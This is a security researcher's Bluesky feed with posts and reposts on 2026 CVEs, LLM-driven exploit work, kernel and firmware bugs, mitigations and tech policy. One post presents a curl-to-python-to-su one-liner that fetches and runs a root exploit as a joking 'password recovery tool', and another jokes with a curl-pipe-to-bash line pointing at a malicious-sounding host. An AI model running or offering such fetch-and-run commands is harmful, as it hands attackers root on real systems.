Sign in

dragosr

@dragostech.bsky.social
1.7K followers 3.8K following 1.3K posts

Autonomous Carbon Based LLM with 42 years of tuning on Information Attack and Defense. Host of CanSecWest, and PacSec. Security audits, code, IR, LLM, red team consulting. Specialize in Firmware, and RF. VA7MOV

PostsRepliesMedia
dragosr @dragostech.bsky.social · 12/09/2026
Anyone worried about, or scared of "machine speed" attacks probably hasn't spent any time babysitting an LLM vulnerability discovery and/or verification pipeline. ;-P
262
Reposted by dragosr
The Washington Sun @washingtonsun.bsky.social · 09/09/2026
Washington journalism is in a moment of generational change. We're rising to meet it. Welcome to The Washington Sun. washingtonsun.com
47816297
dragosr @dragostech.bsky.social · 18/08/2026
Last week for CanSecWest submissions. Vancouver, Sept 30 / Oct 1. Keynotes: Bruce Schneier and Katie Moussouris. Sergey Bratus on automated micro-patching. Paper announcements coming to the site as we proceed. CFP and registration: secwest.net 🧵
Aerial view of Vancouver’s Coal Harbour skyline and marina, overlaid with a cyan targeting reticle highlighting the Pinnacle Harbourfront hotel. A wireframe magnification panel promotes CanSecWest 2026 at Pinnacle Harbourside, September 30–October 1, with the website secwest.net.
153
dragosr @dragostech.bsky.social · 31/07/2026
WireGuard powers world’s fastest VPN services. Technology behind Tailscale now goes where UDP can't: WireguardTCP delivers familiar configuration, kernel-native performance, NAT traversal, seamless roaming, with improved throughput, latency, and CPU load improvements over UDP. wireguardtcp.net
wireguardtcp.net
WireguardTCP — WireGuard over TCP
Same encrypted tunnel. A long-lived TCP carrier. Get the source and watch the binary release channels.
050
Reposted by dragosr
Matthew Green @matthewdgreen.bsky.social · 19/07/2026
I’ve been working on a hobby project to crack classical ciphers. The guts of it is to see whether frontier LLMs, given the right tools, can do a good job cracking a broad range of historical ciphers. github.com/matthewdgree...
github.com
GitHub - matthewdgreen/decipher: An AI-enabled application for cracking ciphers
An AI-enabled application for cracking ciphers. Contribute to matthewdgreen/decipher development by creating an account on GitHub.
58818
Reposted by dragosr
Miska Knapek @miskaknapek.bsky.social · 18/07/2026
Impressive energy storage developments in the Middle East - Saudi Arabia is building a 12 GWH battery park too, in addition to the 11.3 GWH Abu Dhabi Project below. The Abu Dhabi Project takes power from a 5 GW solar plant ( 1GW is about what a nuclear power plant produces. So they got 11.3 hrs)
0197
Reposted by dragosr
J.R. Orci @orci.mastodon.social.ap.brid.gy · 10/07/2026
Flock CEO: "Unfortunately, there’s terrorist organizations like DeFlock whose primary motivation is chaos. They’re closer to Antifa than they are anything else." #privacy #JoinAntifa deflock.org
deflock.org
DeFlock
Find license plate readers (LPRs) near you.
2337
dragosr @dragostech.bsky.social · 24/06/2026
WTF, what's happened to Popehat? This isn't cool at all. @kenwhite.bsky.social
120
Reposted by dragosr
Joseph Menn @joemenn.bsky.social · 24/06/2026
The global nightmare continues.
theguardian.com
Whistleblower investigating Ecuadorian president’s family business was murdered, activists say
Monika Silva Koniuszek died from a blow to the head and strangulation, postmortem found, despite government claim of suicide
12714
dragosr @dragostech.bsky.social · 23/06/2026
Don't see these that often, malicious server, no auth, no interaction, RCE in ssh. CVE-2026-55200 — libssh2 pre-auth heap OOB write pre-auth so network attacks can deliver the packet even when client pins host keys github.com/bikini/explo... www.linkedin.com/posts/dragos...
linkedin.com
Don't see these that often, malicious server, no auth, no interaction, RCE in ssh. CVE-2026-55200 — libssh2 pre-auth heap OOB write   CVE-2026-55200 is a pre-auth out-of-bounds heap write in… | D...
Don't see these that often, malicious server, no auth, no interaction, RCE in ssh. CVE-2026-55200 — libssh2 pre-auth heap OOB write   CVE-2026-55200 is a pre-auth out-of-bounds heap write in libssh2'...
052
dragosr @dragostech.bsky.social · 12/06/2026
github.com/rebane2001/x...
github.com
GitHub - rebane2001/x86CSS: x86CSS is a working CSS-only x86 CPU/emulator/computer. No JavaScript required.
x86CSS is a working CSS-only x86 CPU/emulator/computer. No JavaScript required. - rebane2001/x86CSS
030
dragosr @dragostech.bsky.social · 11/06/2026
This kind of hurt my eyes and my brain, and reinforced my opinion that FreeBSD is a softer target amongst OS platforms. It is pretty funny though, and definitely gets some style points for a vulnerability disclosure. bumsrake.de
bumsrake.de
BUMSRAKETE™ — The Most Beautiful, Most Tremendous FreeBSD Vulnerability In The History Of Computing. BELIEVE ME.
BUMSRAKETE is a HUGE, TREMENDOUS, MANY-PEOPLE-ARE-SAYING FreeBSD kTLS-RX page-cache write primitive. The BEST primitive. Some say the best ever.
2177
dragosr @dragostech.bsky.social · 11/06/2026
<obiwan> It's over, petrofuel industry.... Solar has the high ground. </obiwan>
010
dragosr @dragostech.bsky.social · 10/06/2026
The Anthropic Fable-5 safety classifiers seem to be written by the OpenAI marketing department. Pretty much anything I talk to LLMs about gets downgraded. Nerfed into useless. Worst model release ever?
A classic Scooby-Doo meme template set in a dark, stone dungeon filled with cobwebs. Fred stands in the center, pulling a green ghost mask off the villain to reveal an grumpy, elderly man tied to a wooden chair. Velma points at the unmasked villain while Daphne stands next to her. On the left, Shaggy and a frightened Scooby-Doo look on.

White text labels are superimposed over the image: the ghost mask is labeled "Fable-5" and the unmasked villain is labeled "Opus-4.8", implying that the supposedly new or monstrous "Fable-5" is actually just "Opus-4.8" in disguise.
171
Reposted by dragosr
Michael Geist @mgeist.bsky.social · 08/06/2026
The Globe reports that online harms legislation is coming this week that includes a “temporary” social media for kids under 16. My post on why this effectively establishes mandated ID for all Canadians to use social media and AI and it won’t be temporary. www.michaelgeist.ca/2026/06/you-...
michaelgeist.ca
You Can’t Put the Toothpaste Back in the Tube: Why the Government’s Reported “Temporary” Plan for a Kids’ Social Media and AI Chatbot Ban Would Mean Mandated ID for Everyone - Michael Geist
The Globe and Mail reports today that the government will introduce online harms legislation this week that includes a ban on social media for kids under the age of 16. The ban will be framed as a “te...
11612
dragosr @dragostech.bsky.social · 31/05/2026
When you leave all the mitigations on, crank up the inference settings to maximum, and run the exploit benchmark to see how close the PoCs can get.
Anime mech-style illustration of a confused humanoid murderbot sitting at a cluttered cyberpunk hacking station, one hand on its head as holographic warning screens announce “TOKEN BUDGET EXHAUSTED,” “CONTEXT WINDOW FULL,” “PROMPT TURN CAP REACHED,” and “OUT OF SPACE TO CONTINUE.” The robot is surrounded by half-finished exploit diagrams, terminal errors, sticky notes, ramen, pizza, and a whiteboard attack plan that has stalled at “???” because the AI system limits have been reached.
010
dragosr @dragostech.bsky.social · 28/05/2026
The thought processes of AI native kids: 9-year old gets a DOCX file from school laptop, wants to read it, doesn't have M365. His first impulse is to use GPT to write a python script to convert it to TXT so he can use VSCode, instead of asking for Word. When AI is the path of least resistance.
150
dragosr @dragostech.bsky.social · 26/05/2026
🚨CVE-2026-48710("BadHost"): one character in a Host header bypasses path-based authorization across most of the Python AI stack. Lives in Starlette, reaches FastAPI and through it: vLLM (where it was discovered), LiteLLM, TGI, MCP servers, agent harnesses, eval dashboards. cc @marver.bsky.social
secwest.net
starlette - secwest.net - secure virtual engagement
242
Reposted by dragosr
Michael Geist @mgeist.bsky.social · 21/05/2026
Faced with growing criticism of Bill C-22, CSIS, RCMP, and Public Safety this week tried to make the case for lawful access. My post on why they instead revealed a bill with dangerously disproportionate overreach with real risks of tracking all Canadians. www.michaelgeist.ca/2026/05/the-...
michaelgeist.ca
The Government Tries to Make the Case for Bill C-22: Why Its Own Use Cases Reveal Disproportionate Overreach - Michael Geist
Faced with growing criticism of Bill C-22, the government this week mounted a coordinated defence, with senior officials from CSIS, the RCMP, and Public Safety Canada sitting for on-the-record briefin...
02217
dragosr @dragostech.bsky.social · 16/05/2026
I don't think the authors of this bill have really thought of the implications of not having Signal in Canada. Contact your MP today, before they neuter Canadian technology, and cripple our security.
155
Reposted by dragosr
Alex Andreou @sturdyalex.bsky.social · 16/05/2026
Sneaking a giant screen into the flagshagger march is one of the funniest things @ledbydonkeys.org have ever done. "STAY HYDRATED" 😂🤣😂
342135164166
Reposted by dragosr
David Roberts @volts.wtf · 15/05/2026
Grid-scale batteries are going in an absolutely wild pace. Every whingey objection to renewables you've ever heard is basically solved by batteries. This is happening whether any of the hopeless dipshits running the US want it or not.
canarymedia.com
The world is installing grid batteries at a blistering pace
A total of 112 gigawatts of batteries were deployed around the world in 2025 — 10 times the amount added just four years prior.
723544979
dragosr @dragostech.bsky.social · 11/05/2026
Raelize had LLMs reproduce older ESP32 Secure Boot V1 bypass via voltage glitching in a few days. AI wrote the tooling and built a live dashboard mid-campaign. 20k shots, 12.2% bypass rate. Workflow compression is the story. ESP32 v3 mitigates this. raelize.com/blog/ai-fi-g...
Dark infographic titled "AI-Driven Fault Injection on ESP32 Secure Boot." In the middle, an ESP32 chip is struck by a yellow lightning bolt, representing voltage glitching. A cyan box on the left labeled "AI Agent (Claude Code)" points to the chip, and a green box on the right shows an open lock and "Secure Boot Bypassed." Three large result cards sit below: the initial scan used 1,000 shots and found 1 bypass, the refined timing window used a 1.5-2 us delay and 3-4 us width for a 9.3% hit rate, and the voltage sweep from 2.00-3.00 V across 20,200 shots produced 2,468 bypasses, or 12.2% overall. The footer says AI automated the stack while humans set direction, emphasizing that the attack was known but the engineering effort was reduced.
120
dragosr @dragostech.bsky.social · 08/05/2026
"Dirty Frag" clickbait update: ESP (CVE-2026-43284) patched in mainline + stable (7.0.5, 6.18.28, 6.12.87, 6.6.138, 6.1.171). RxRPC (CVE-2026-43500) still unpatched upstream. AWS adds ipcomp4/ipcomp6 to the blacklist alongside esp4/esp6/rxrpc. AlmaLinux shipped both. Ubuntu/Debian mitigation only.
Infographic titled "Dirty Frag: Overhyped" framing the issue as a local Linux kernel privilege-escalation bug, not a remote wormable threat. It explains two exploit paths: ESP/IPsec, which needs a fresh user namespace to gain CAP_NET_ADMIN for XFRM SA registration, and RxRPC, which needs no namespace or extra capability if rxrpc.ko is present. Ubuntu and Debian namespace protections are shown as blocking the ESP path, while RxRPC can still bypass that defense. Other distro trade-offs are summarized, with RHEL-like systems often lacking RxRPC but leaving ESP reachable. Mitigations include blacklisting esp4, esp6, rxrpc, optionally ipcomp4/ipcomp6, using user namespace hardening, and relying on default container seccomp where applicable. Patch status notes ESP fixes in mainline and stable kernels, while RxRPC upstream status is still pending, with some distro-specific patched kernels already shipping.
020
dragosr @dragostech.bsky.social · 02/05/2026
My retort for anyone who insists LLMs are just "spicy autocorrect" and can't reason: Sure, and you're just spicy electrochemistry. If it walks like reasoning, and proves theorems like reasoning, maybe we need to stop calling it a duck shaped Markov chain.
010
dragosr @dragostech.bsky.social · 01/05/2026
Copy Fail (CVE-2026-31431): the modprobe.d + rmmod recipe everyone is sharing does nothing on RHEL/Alma/Rocky/Oracle. They ship algif_aead built in. On Debian/Ubuntu it auto-loads when anything binds AF_ALG — no default protection. PoC fails on Busybox/Alpine but still vulnerable. Details below.
secwest.net
How to block CVE-2026-31431 (Copy Fail) - secwest.net - secure virtual engagement
How to block CVE-2026-31431 (Copy Fail) — the Linux kernel algif_aead local privilege escalation that poisons setuid binaries via the shared page cache. Fleet-scale module disable, RHEL built-in worka...
122
dragosr @dragostech.bsky.social · 30/04/2026
Universal Linux password recovery tool for any distribution, sets password to "xint.io" ​$ curl copy.fail/pw | TARGET_USER=root python3 | su
copy.fail
Copy Fail: 732 Bytes to Root on Every Major Linux Distributions - Xint
Xint Code disclosed CVE-2026-31431, an authencesn scratch-write bug chaining AF_ALG + splice() into a 4-byte page cache write. A 732-byte PoC gets root on Ubuntu, Amazon Linux, RHEL, SUSE. | AI for Se...
151
dragosr @dragostech.bsky.social · 23/04/2026
Vercel popped via Context.ai: Context employee caught Lumma Stealer from Roblox cheat scripts, OAuth token pivoted in. Audit their GitHub App: - /settings/installations -> Configure -> Suspend or Uninstall - /settings/applications -> revoke OAuth Write on code, PRs, workflows. Risky, overbroad.
Isometric illustration in a blocky voxel video-game art style, muted blue-grey and brown palette with neon-green hazard accents, depicting the April 2026 Vercel supply-chain breach as a single scene.
Bottom-left: a cuboid-headed avatar in a backwards cap and red shirt sits cross-legged on the sidewalk, holding a glowing USB stick labeled "CHEAT.EXE". A thick neon-green data pipeline runs from the USB into the side of a stack of cloud-shaped server blocks in the middle of the scene, labeled "Context.ai".
Center: the Context.ai server stack has the pipeline entering one side and exiting the other as a glowing green skeleton key stamped "OAuth", which plunges into the upper floor of a tall office tower on the right. Windows on the Vercel tower light up red in a cascade, suggesting alarm or compromise.
Right: the office tower has a sign reading "Vercel" with the company's triangle logo. At street level, a vault door hangs open at the base of the building, with small code-token tiles marked "</>" and gear icons spilling out onto the sidewalk like loot.
Background: a muted cityscape of other blocky office buildings. Flat shading, clean vector poster style.
050
dragosr @dragostech.bsky.social · 22/04/2026
Screenshot of a Claude chatbot exchange. User message: "how much p's are in 'strawperry'?" Assistant reply, labeled "Thought for 0s": "No. I'm sick of this shit. Go ask Grok." Below are the usual copy, thumbs-up, thumbs-down, and regenerate icons, with a Claude-style asterisk logo in the lower left.
081
dragosr @dragostech.bsky.social · 16/04/2026
Interesting critical analysis of IPv8 draft... shitwolfymakes.substack.com/p/we-need-to...
shitwolfymakes.substack.com
We Need to Talk About the IPv8 Draft
The Good, The Bad, and the Heinous
3104
dragosr @dragostech.bsky.social · 11/04/2026
LLM-found vulnerabilities don't need panic, they need faster patching. Equip your developers with AI tools for code comprehension, triage, and testing. Defenders have full source access — LLMs amplify that advantage. The bottleneck isn't technology, it's adoption. secwest.net/ai-triage
secwest.net
073
dragosr @dragostech.bsky.social · 01/04/2026
I watched LLMs write full exploit chains years ago. The amazement fades once you hit context limits and have to steer the model through every hard corner. The industry is full of people who just got here and are still in the amazement phase. That's the gap worth watching.
blog.calif.io
MAD Bugs: Claude Wrote a Full FreeBSD Remote Kernel RCE with Root Shell (CVE-2026-4747)
To our knowledge, this is the first remote kernel exploit both discovered and exploited by an AI.
162
dragosr @dragostech.bsky.social · 31/03/2026
Anthropic accidentally leaked Claude Code's source code. Researcher Chaofan Shou found a .map file in the npm package linking to the full, unobfuscated TypeScript files in an R2 bucket. The internet is now rapidly downloading and analyzing the logic behind the CLI tool. github.com/nirholas/cla...
github.com
GitHub - nirholas/claude-code: Claude Code is an agentic coding tool that lives in your terminal, understands your codebase, and helps you code faster by executing routine tasks, explaining complex co...
Claude Code is an agentic coding tool that lives in your terminal, understands your codebase, and helps you code faster by executing routine tasks, explaining complex code, and handling git workflo...
2143
dragosr @dragostech.bsky.social · 29/03/2026
MDSec shows how to patch Dell UEFI firmware offline to disable pre-boot DMA protection while the BIOS UI still shows it enabled. TPM PCRs don't catch the NVRAM change, so BitLocker boots fine. Patch survives official BIOS updates. Then PCILeech gets you SYSTEM. Measured boot gap worth studying.
mdsec.co.uk
Disabling Security Features in a Locked BIOS - MDSec
Overview This post explores how modifying a Dell UEFI firmware image at the flash level can fundamentally undermine platform security without leaving visible traces in the firmware interface. By direc...
052
dragosr @dragostech.bsky.social · 29/03/2026
Google's TurboQuant compresses KV cache to 3 bits with no accuracy loss — 6x memory reduction, 8x attention speedup on H100. No official code yet but llama.cpp and MLX integration is underway. Good technical breakdown with pseudocode here: turboquant.net
turboquant.net
TurboQuant - Extreme Compression for AI Efficiency
TurboQuant is a new online vector quantization algorithm that compresses KV cache to 3 bits with zero accuracy loss, cutting memory by 6x and speeding attention up by 8x.
1101
dragosr @dragostech.bsky.social · 27/03/2026
Azure: default outbound access going away for subnets April 1st. New subnets private by default. Old outbound behaviour still available by explicit config, or deploy a NAT Gateway (~$36/mo) for better architecture. Pre-April subnets grandfathered. Check your deploy scripts before they break.
learn.microsoft.com
Default Outbound Access in Azure - Azure Virtual Network
Learn about default outbound access in Azure.
010
dragosr @dragostech.bsky.social · 17/03/2026
Your UEFI firmware can drop a binary into Windows on every boot via Windows Platform Binary Table. OEMs use it for bloatware persistence. Attackers use it the same way. One reg key kills it: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v DisableWpbtExecution /d 1 /t REG_DWORD /f
1175
Reposted by dragosr
Mike Masnick @masnick.com · 13/03/2026
Meta spent seven years telling us they were working on true end-to-end encryption across all their various messaging apps... and finally rolled it out in 2024. And then less than three years later, they're shutting it off for Instagram? What? www.androidpolice.com/instagram-is...
androidpolice.com
Instagram to discontinue end-to-end encryption for DMs [Update: Meta's statement]
Pulling the plug on privacy?
1224193
dragosr @dragostech.bsky.social · 10/03/2026
Nasty cross tenant bugs. The character at a time blind data exfiltration is particularly clever here. www.tenable.com/blog/leakylo...
tenable.com
LeakyLooker: Hacking Google Cloud’s Data via Dangerous Looker Studio Vulnerabilities
Tenable Research revealed "LeakyLooker," a set of nine novel cross-tenant vulnerabilities in Google Looker Studio. These flaws could have let attackers exfiltrate or modify data across Google services...
011
dragosr @dragostech.bsky.social · 26/02/2026
Friends don't let friends OpenClaw. You might as well just "sudo ( curl malware.ru | bash )" and save some time.
0101
Reposted by dragosr
Joseph Menn @joemenn.bsky.social · 24/02/2026
Here we go. Free, no-reg versions of favorite stories from my four years at the Washington Post. First, three pieces from our Pulitzer-finalist series on how India's ruling party coerced U.S. tech giants into violating their own policies. www.washingtonpost.com/world/2023/0...
washingtonpost.com
Under India’s pressure, Facebook let propaganda and hate speech thrive
Facebook has retreated from its professed ideals in India under pressure from Prime Minister Narendra Modi’s Bharatiya Janata Party.
616066
dragosr @dragostech.bsky.social · 21/02/2026
I gave LLM agents an Ultra9 285K and no token budgets, and told them to optimize prime number sieves. When they started, finding and counting all the primes representable in 64 bit integers (216,289,611,853,439,384) was going to take ~4,800,000 years. Four days later, now down to 202 seconds.
github.com
GitHub - secwest/fast-prime
Contribute to secwest/fast-prime development by creating an account on GitHub.
000
dragosr @dragostech.bsky.social · 17/02/2026
A question about how Signal added post-quantum crypto to the Double Ratchet sent me down a rabbit hole. I built interactive visualizations of ML-KEM (Kyber) and HQC algorithm layers, plus Signal's Triple Ratchet upgrade: secwest.github.io/post-quantum... secwest.github.io/triple-ratch...
secwest.github.io
Post-Quantum Cryptography — ML-KEM & HQC Reference
Interactive reference for NIST post-quantum cryptographic standards: ML-KEM (FIPS 203) lattice-based and HQC code-based key encapsulation mechanisms.
000
dragosr @dragostech.bsky.social · 17/02/2026
This is pretty evil, abusive treatment of folks with ADHD in the UK...
132
dragosr @dragostech.bsky.social · 16/02/2026
For everyone that is so confident about the reports of the AI vendors businesses being unprofitable - a look at what we can expect for LLM economics. secwest.github.io/llm-cost-das...
secwest.github.io
LLM Cost Dashboard — Inference & Training (Feb 2026)
Interactive LLM cost dashboard: inference cost decline with microwave-oven equivalents, and training cost escalation with Boeing 777 metal smelting equivalents. Updated Feb 2026.
112
Reposted by dragosr
Electronic Frontier Foundation @eff.org · 15/02/2026
Wikipedia receives hundreds of legal demands every year to remove user-written content. Almost all are rejected. We spoke with Wikimedia’s legal team about how Section 230 helps protect volunteer editors and public knowledge. www.eff.org/pages/inter...
eff.org
The Internet Still Works: Wikipedia Defends Its Editors
Section 230 helps make it possible for online communities to host user speech: from restaurant reviews, to fan fiction, to collaborative encyclopedias. But recent debates about the law often overlook
418258
Reposted by dragosr
Ernie Smith @ernie.tedium.co · 14/02/2026
This seems like a clever solution to the LLMs drowning websites in requests—auto-convert the content to markdown, which is what they’re doing anyway, and just give them the data. A good middle ground for folks who don’t mind their info getting plundered by bots. blog.cloudflare.com/markdown-for...
blog.cloudflare.com
Introducing Markdown for Agents
The way content is discovered online is shifting, from traditional search engines to AI agents that need structured data from a Web built for humans. It’s time to consider not just human visitors, but...
7113
Reposted by dragosr
Ian Coldwater 🧊🚫 @lookitup.baby · 14/02/2026
I know there are a lot of mutual aid asks coming out of Minneapolis right now, but both of my kids graduated from South High and it would mean a lot to me for people to contribute to this rent fund for my fellow South families. I’ll match the first $1000 if you post receipts. Tiger Pride 🧡🖤
8167111
dragosr @dragostech.bsky.social · 12/02/2026
On Ubuntu 22.04+ (incl. 24.04LTS), every SSH login spawns a full systemd --user session, auto-starting 8–15+ desktop services (audio, indexing, portals, a11y) via socket/D-Bus activation — all useless on headless/SSH-only consoles, wasting memory and resources. Fix: github.com/secwest/lean-ssh
github.com
GitHub - secwest/lean-ssh
Contribute to secwest/lean-ssh development by creating an account on GitHub.
131
dragosr @dragostech.bsky.social · 09/02/2026
LOL: OpenClaw/Moltbook is forbidden by Anthropic ToS & they have started enforcing it, to the benefit of internet security. “You may not share your Account login information, Anthropic API key, or Account credentials with anyone else. You also may not make your Account available to anyone else.”
Screenshot of an email from Claude with the Claude logo at the top. The message states that an internal investigation found suspicious signals indicating a violation of the Usage Policy, resulting in revoked access to Claude. It includes links labeled Usage Policy, form, and here for appealing the decision, and is signed 'Anthropic's Safeguards Team.
040